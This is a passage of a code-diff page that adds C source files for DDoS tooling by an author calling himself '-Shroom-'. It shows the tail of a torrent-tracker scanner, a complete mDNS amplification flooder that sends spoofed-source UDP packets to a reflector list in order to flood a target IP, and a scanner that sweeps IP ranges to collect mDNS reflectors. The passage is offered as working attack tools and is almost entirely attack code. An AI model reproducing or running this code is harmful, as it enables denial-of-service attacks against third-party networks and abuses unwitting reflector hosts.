exit(-1);
|
||||
}
|
||||
for(w=ntohl(start_ip);w<htonl(end);w++)
|
||||
{
|
||||
struct sockaddr_in servaddr;
|
||||
bzero(&servaddr, sizeof(servaddr));
|
||||
servaddr.sin_family = AF_INET;
|
||||
servaddr.sin_addr.s_addr=htonl(w);
|
||||
servaddr.sin_port=htons(xport);
|
||||
sendto(sock,payload,size,0, (struct sockaddr *)&servaddr,sizeof(servaddr));
|
||||
bytes_sent+=size;
|
||||
scanned++;
|
||||
hosts_done++;
|
||||
}
|
||||
close(sock);
|
||||
running_threads--;
|
||||
return;
|
||||
}
|
||||
|
||||
void sighandler(int sig)
|
||||
{
|
||||
fclose(fd);
|
||||
printf("\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
void *recievethread()
|
||||
{
|
||||
printf("\n");
|
||||
int saddr_size, data_size, sock_raw;
|
||||
struct sockaddr_in saddr;
|
||||
struct in_addr in;
|
||||
|
||||
unsigned char *buffer = (unsigned char *)malloc(65536);
|
||||
sock_raw = socket(AF_INET , SOCK_RAW , IPPROTO_UDP);
|
||||
if(sock_raw < 0)
|
||||
{
|
||||
printf("Socket Error\n");
|
||||
exit(1);
|
||||
}
|
||||
while(1)
|
||||
{
|
||||
saddr_size = sizeof saddr;
|
||||
data_size = recvfrom(sock_raw , buffer , 65536 , 0 , (struct sockaddr *)&saddr , &saddr_size);
|
||||
if(data_size <0 )
|
||||
{
|
||||
printf("Recvfrom error , failed to get packets\n");
|
||||
exit(1);
|
||||
}
|
||||
struct iphdr *iph = (struct iphdr*)buffer;
|
||||
if(iph->protocol == 17)
|
||||
{
|
||||
unsigned short iphdrlen = iph->ihl*4;
|
||||
struct udphdr *udph = (struct udphdr*)(buffer + iphdrlen);
|
||||
unsigned char* payload = buffer + iphdrlen + payloadsize;
|
||||
if(ntohs(udph->source) == xport)
|
||||
{
|
||||
int body_length = data_size - iphdrlen - payloadsize;
|
||||
|
||||
if (body_length > 40)
|
||||
|
||||
{
|
||||
found_srvs++;
|
||||
|
||||
fprintf(fd,"%s %d\n",inet_ntoa(saddr.sin_addr),body_length);
|
||||
fflush(fd);
|
||||
|
||||
}
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
}
|
||||
close(sock_raw);
|
||||
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Shrooms Torrent Scanner\nUsage: %s <ip range start (192.0.0.0)> <ip range end (198.255.255.255)> <outfile> <threads> <scan delay in ms>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
fd = fopen(argv[3], "a");
|
||||
sleep_between = atoi(argv[5]);
|
||||
|
||||
signal(SIGINT, &sighandler);
|
||||
|
||||
int threads = atoi(argv[4]);
|
||||
pthread_t thread;
|
||||
|
||||
pthread_t listenthread;
|
||||
pthread_create( &listenthread, NULL, &recievethread, NULL);
|
||||
|
||||
char *str_start = malloc(18);
|
||||
memset(str_start, 0, 18);
|
||||
str_start = argv[1];
|
||||
char *str_end = malloc(18);
|
||||
memset(str_end, 0, 18);
|
||||
str_end = argv[2];
|
||||
start = inet_addr(str_start);
|
||||
per_thread = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start))) / threads;
|
||||
unsigned long toscan = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start)));
|
||||
int i;
|
||||
for(i = 0;i<threads;i++){
|
||||
pthread_create( &thread, NULL, &flood, (void *) i);
|
||||
}
|
||||
sleep(1);
|
||||
printf("Scan in Progress \n");
|
||||
char *temp = (char *)malloc(17);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Trackers Found");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "IP/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Bytes/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Threads");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Percent Done");
|
||||
printf("%s", temp);
|
||||
printf("\n");
|
||||
|
||||
char *new;
|
||||
new = (char *)malloc(16*6);
|
||||
while (running_threads > 0)
|
||||
{
|
||||
printf("\r");
|
||||
memset(new, '\0', 16*6);
|
||||
sprintf(new, "%s|%-15lu", new, found_srvs);
|
||||
sprintf(new, "%s|%-15d", new, scanned);
|
||||
sprintf(new, "%s|%-15d", new, bytes_sent);
|
||||
sprintf(new, "%s|%-15d", new, running_threads);
|
||||
memset(temp, 0, 17);
|
||||
int percent_done=((double)(hosts_done)/(double)(toscan))*100;
|
||||
sprintf(temp, "%d%%", percent_done);
|
||||
sprintf(new, "%s|%s", new, temp);
|
||||
printf("%s", new);
|
||||
fflush(stdout);
|
||||
bytes_sent=0;
|
||||
scanned = 0;
|
||||
sleep(1);
|
||||
}
|
||||
printf("\n");
|
||||
fclose(fd);
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,191 @@
|
|||
/* MDNS Amplification */
|
||||
|
||||
/* Made by -Shroom-, credit me cus im swag for payload and idk for original script. */
|
||||
|
||||
#include <time.h>
|
||||
#include <pthread.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/udp.h>
|
||||
#include <arpa/inet.h>
|
||||
#define MAX_PACKET_SIZE 8192
|
||||
#define PHI 0x9e3779b9
|
||||
static uint32_t Q[4096], c = 362436;
|
||||
struct list
|
||||
{
|
||||
struct sockaddr_in data;
|
||||
struct list *next;
|
||||
struct list *prev;
|
||||
};
|
||||
struct list *head;
|
||||
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
|
||||
void init_rand(uint32_t x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++)
|
||||
{
|
||||
Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
|
||||
}
|
||||
}
|
||||
|
||||
uint32_t rand_cmwc(void)
|
||||
{
|
||||
uint64_t t, a = 18782LL;
|
||||
static uint32_t i = 4095;
|
||||
uint32_t x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
|
||||
/* function for header checksums */
|
||||
unsigned short csum (unsigned short *buf, int nwords)
|
||||
{
|
||||
unsigned long sum;
|
||||
for (sum = 0; nwords > 0; nwords--)
|
||||
sum += *buf++;
|
||||
sum = (sum >> 16) + (sum & 0xffff);
|
||||
sum += (sum >> 16);
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 46;
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = IPPROTO_UDP;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
|
||||
void setup_udp_header(struct udphdr *udph)
|
||||
{
|
||||
udph->source = htons(5678);
|
||||
udph->dest = htons(5353);
|
||||
udph->check = 0;
|
||||
memcpy((void *)udph + sizeof(struct udphdr), "\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x09\x5F\x73\x65\x72\x76\x69\x63\x65\x73\x07\x5F\x64\x6E\x73\x2D\x73\x64\x04\x5F\x75\x64\x70\x05\x6C\x6F\x63\x61\x6C\x00\x00\x0C\x00\x01", 46);
|
||||
udph->len=htons(sizeof(struct udphdr) + 46);
|
||||
}
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
struct thread_data *td = (struct thread_data *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
|
||||
struct sockaddr_in sin = td->sin;
|
||||
struct list *list_node = td->list_node;
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_udp_header(udph);
|
||||
udph->source = sin.sin_port;
|
||||
iph->saddr = sin.sin_addr.s_addr;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
int i=0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
|
||||
list_node = list_node->next;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
if(i==5)
|
||||
{
|
||||
usleep(0);
|
||||
i=0;
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 4){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <target port> <reflection file> <throttle> <time (optional)>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
int i = 0;
|
||||
head = NULL;
|
||||
fprintf(stdout, "Setting up Sockets...\n");
|
||||
int max_len = 128;
|
||||
char *buffer = (char *) malloc(max_len);
|
||||
buffer = memset(buffer, 0x00, max_len);
|
||||
int num_threads = atoi(argv[4]);
|
||||
FILE *list_fd = fopen(argv[3], "r");
|
||||
while (fgets(buffer, max_len, list_fd) != NULL) {
|
||||
if ((buffer[strlen(buffer) - 1] == '\n') ||
|
||||
(buffer[strlen(buffer) - 1] == '\r')) {
|
||||
buffer[strlen(buffer) - 1] = 0x00;
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct list *)malloc(sizeof(struct list));
|
||||
bzero(&head->data, sizeof(head->data));
|
||||
head->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct list *new_node = (struct list *)malloc(sizeof(struct list));
|
||||
memset(new_node, 0x00, sizeof(struct list));
|
||||
new_node->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
i++;
|
||||
} else {
|
||||
continue;
|
||||
}
|
||||
}
|
||||
struct list *current = head->next;
|
||||
pthread_t thread[num_threads];
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_port = htons(atoi(argv[2]));
|
||||
sin.sin_addr.s_addr = inet_addr(argv[1]);
|
||||
struct thread_data td[num_threads];
|
||||
for(i = 0;i<num_threads;i++){
|
||||
td[i].thread_id = i;
|
||||
td[i].sin= sin;
|
||||
td[i].list_node = current;
|
||||
pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
|
||||
}
|
||||
fprintf(stdout, "Starting Flood...\n");
|
||||
if(argc > 5)
|
||||
{
|
||||
sleep(atoi(argv[5]));
|
||||
} else {
|
||||
while(1){
|
||||
sleep(1);
|
||||
}
|
||||
}
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,199 @@
|
|||
/* MDNS Amplification scanner, made by -Shroom-, credits to whoever made this scanner source because I have no idea. */
|
||||
#include <pthread.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/in.h>
|
||||
#include <signal.h>
|
||||
#include <sys/time.h>
|
||||
#include <sys/types.h>
|
||||
#include <math.h>
|
||||
#include <ctype.h>
|
||||
#include <errno.h>
|
||||
#include <arpa/inet.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/udp.h>
|
||||
|
||||
volatile int running_threads = 0;
|
||||
volatile int found_srvs = 0;
|
||||
volatile unsigned long per_thread = 0;
|
||||
volatile unsigned long start = 0;
|
||||
volatile unsigned long scanned = 0;
|
||||
volatile int sleep_between = 0;
|
||||
volatile int bytes_sent = 0;
|
||||
volatile unsigned long hosts_done = 0;
|
||||
FILE *fd;
|
||||
char payload[] =
|
||||
"\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x09\x5F\x73\x65\x72\x76\x69\x63\x65\x73\x07\x5F\x64\x6E\x73\x2D\x73\x64\x04\x5F\x75\x64\x70\x05\x6C\x6F\x63\x61\x6C\x00\x00\x0C\x00\x01";
|
||||
|
||||
size = sizeof(payload);
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
running_threads++;
|
||||
int thread_id = (int)par1;
|
||||
unsigned long start_ip = htonl(ntohl(start)+(per_thread*thread_id));
|
||||
unsigned long end = htonl(ntohl(start)+(per_thread*(thread_id+1)));
|
||||
unsigned long w;
|
||||
int y;
|
||||
unsigned char buf[65536];
|
||||
memset(buf, 0x01, 46);
|
||||
int sizeofpayload = 46;
|
||||
int sock;
|
||||
if((sock=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))<0) {
|
||||
perror("cant open socket");
|
||||
exit(-1);
|
||||
}
|
||||
for(w=ntohl(start_ip);w<htonl(end);w++)
|
||||
{
|
||||
struct sockaddr_in servaddr;
|
||||
bzero(&servaddr, sizeof(servaddr));
|
||||
servaddr.sin_family = AF_INET;
|
||||
servaddr.sin_addr.s_addr=htonl(w);
|
||||
servaddr.sin_port=htons(5353);
|
||||
sendto(sock,payload,size,0, (struct sockaddr *)&servaddr,sizeof(servaddr));
|
||||
bytes_sent+=size;
|
||||
scanned++;
|
||||
hosts_done++;
|
||||
}
|
||||
close(sock);
|
||||
running_threads--;
|
||||
return;
|
||||
}
|
||||
|
||||
void sighandler(int sig)
|
||||
{
|
||||
fclose(fd);
|
||||
printf("\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
void *recievethread()
|
||||
{
|
||||
printf("\n");
|
||||
int saddr_size, data_size, sock_raw;
|
||||
struct sockaddr_in saddr;
|
||||
struct in_addr in;
|
||||
|
||||
unsigned char *buffer = (unsigned char *)malloc(65536);
|
||||
sock_raw = socket(AF_INET , SOCK_RAW , IPPROTO_UDP);
|
||||
if(sock_raw < 0)
|
||||
{
|
||||
printf("Socket Error\n");
|
||||
exit(1);
|
||||
}
|
||||
while(1)
|
||||
{
|
||||
saddr_size = sizeof saddr;
|
||||
data_size = recvfrom(sock_raw , buffer , 65536 , 0 , (struct sockaddr *)&saddr , &saddr_size);
|
||||
if(data_size <0 )
|
||||
{
|
||||
printf("Recvfrom error , failed to get packets\n");
|
||||
exit(1);
|
||||
}
|
||||
struct iphdr *iph = (struct iphdr*)buffer;
|
||||
if(iph->protocol == 17)
|
||||
{
|
||||
unsigned short iphdrlen = iph->ihl*4;
|
||||
struct udphdr *udph = (struct udphdr*)(buffer + iphdrlen);
|
||||
unsigned char* payload = buffer + iphdrlen + 46;
|
||||
if(ntohs(udph->source) == 5353)
|
||||
{
|
||||
int body_length = data_size - iphdrlen - 46;
|
||||
|
||||
if (body_length > 40)
|
||||
|
||||
{
|
||||
found_srvs++;
|
||||
|
||||
fprintf(fd,"%s %d\n",inet_ntoa(saddr.sin_addr),body_length);
|
||||
fflush(fd);
|
||||
|
||||
}
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
}
|
||||
close(sock_raw);
|
||||
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Shrooms MDNS Scanner\nUsage: %s <ip range start (192.0.0.0)> <ip range end (198.255.255.255)> <outfile> <threads> <scan delay in ms>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
fd = fopen(argv[3], "a");
|
||||
sleep_between = atoi(argv[5]);
|
||||
|
||||
signal(SIGINT, &sighandler);
|
||||
|
||||
int threads = atoi(argv[4]);
|
||||
pthread_t thread;
|
||||
|
||||
pthread_t listenthread;
|
||||
pthread_create( &listenthread, NULL, &recievethread, NULL);
|
||||
|
||||
char *str_start = malloc(18);
|
||||
memset(str_start, 0, 18);
|
||||
str_start = argv[1];
|
||||
char *str_end = malloc(18);
|
||||
memset(str_end, 0, 18);
|
||||
str_end = argv[2];
|
||||
start = inet_addr(str_start);
|
||||
per_thread = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start))) / threads;
|
||||
unsigned long toscan = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start)));
|
||||
int i;
|
||||
for(i = 0;i<threads;i++){
|
||||
pthread_create( &thread, NULL, &flood, (void *) i);
|
||||
}
|
||||
sleep(1);
|
||||
printf("Scan in Progress \n");
|
||||
char *temp = (char *)malloc(17);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "MDNS Found");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "IP/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Bytes/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Threads");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Percent Done");
|
||||
printf("%s", temp);
|
||||
printf("\n");
|
||||
|
||||
char *new;
|
||||
new = (char *)malloc(16*6);
|
||||
while (running_threads > 0)
|
||||
{
|
||||
printf("\r");
|
||||
memset(new, '\0', 16*6);
|
||||
sprintf(new, "%s|%-15lu", new, found_srvs);
|
||||
sprintf(new, "%s|%-15d", new, scanned);
|
||||
sprintf(new, "%s|%-15d", new, bytes_sent);
|
||||
sprintf(new, "%s|%-15d", new, running_threads);
|
||||
memset(temp, 0, 17);
|
||||
int percent_done=((double)(hosts_done)/(double)(toscan))*100;
|
||||
sprintf(temp, "%d%%", percent_done);
|
||||
sprintf(new, "%s|%s", new, temp);
|
||||
printf("%s", new);
|
||||
fflush(stdout);
|
||||
bytes_sent=0;
|
||||
scanned = 0;
|
||||
sleep(1);
|
||||
}
|
||||
printf("\n");
|
||||
fclose(fd);
|
||||
return 0;
|
||||
}
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue